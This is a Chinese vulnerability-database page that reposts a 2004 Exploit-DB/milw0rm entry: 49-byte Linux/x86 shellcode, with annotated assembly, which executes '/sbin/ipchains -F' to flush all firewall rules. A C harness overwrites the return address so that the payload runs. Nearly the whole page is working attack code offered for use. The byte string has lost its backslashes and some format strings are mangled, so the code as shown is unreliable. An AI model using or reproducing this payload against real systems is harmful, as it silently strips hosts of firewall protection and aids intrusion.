Linux/x86 – Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)

Linux/x86 – Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)

漏洞ID 1054651 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-Linux/x86 – Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)-安全小百科CVE编号 N/A
图片[2]-Linux/x86 – Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13441
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#include <stdio.h>
#include <string.h>

/* 
__asm__("

sub     $0x4,%esp   ## Con esto conseguimos que la shellcode nunca se
popl    %esp        ## sobreescriba... gracias RaiSe :)

xorl    %edx,%edx   ## %edx a cero
pushl   %edx        ## y ponemos los zeros del final del string en memoria
pushw   $0x462d     ## tenemos -F0000

movl    %esp,%esi   ## wardamos argv[1] en %esi

pushl   %edx        ## 0000-F0000

pushl   $0x736e6961
pushl   $0x68637069 ## ipchains0000-F0000

movl    %esp,%edi   ## wardamos argv[0] en %edi

pushl   $0x2f6e6962
pushl   $0x732f2f2f ## ///sbin/ipchains0000-F0000

movl    %esp,%ebx   ## en %ebx, el nombre de archivo

pushl   %edx        ## 0000///sbin/ipchains0000-F0000
pushl   %esi        ## A[1]0000///sbin/ipchains0000-F0000
pushl   %edi        ## A[0]A[1]0000///sbin/ipchains0000-F0000

movl    %esp,%ecx   ## %ecx apunta a el inicio del argv[]

xorl    %eax,%eax
movb    $0xb,%al
int     $0x80

");
*/

char c0de[]=
"x83xecx04x5cx31xd2x52x66x68x2dx46x89xe6x52x68x61x69x6ex73"
"x68x69x70x63x68x89xe7x68x62x69x6ex2fx68x2fx2fx2fx73x89xe3"
"x52x56x57x89xe1x31xc0xb0x0bxcdx80";


/* execve("///sbin/ipchains",ARGV,NULL);
 * ARGV[] = {"ipchains","-F",NULL}
 */

int main(void)
{
	long *toRET;
	char vuln[52];

	*(&toRET+2) = (long *)c0de;

	strcpy(vuln, c0de);

	printf("Shellc0de length: %dnRunning.......nn", strlen(c0de));
	return(0);
}

/* Sp4rK <[email protected]>
 * UNDERSEC Security TEAM
 * NetSearch E-zine
 */

// milw0rm.com [2004-09-26]

相关推荐: OpenBSD CHPass不安全临时文件符号链接漏洞

OpenBSD CHPass不安全临时文件符号链接漏洞 漏洞ID 1107192 漏洞类型 信息泄露 发布时间 2003-02-03 更新时间 2003-12-31 CVE编号 CVE-2003-1366 CNNVD-ID CNNVD-200312-419 漏…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享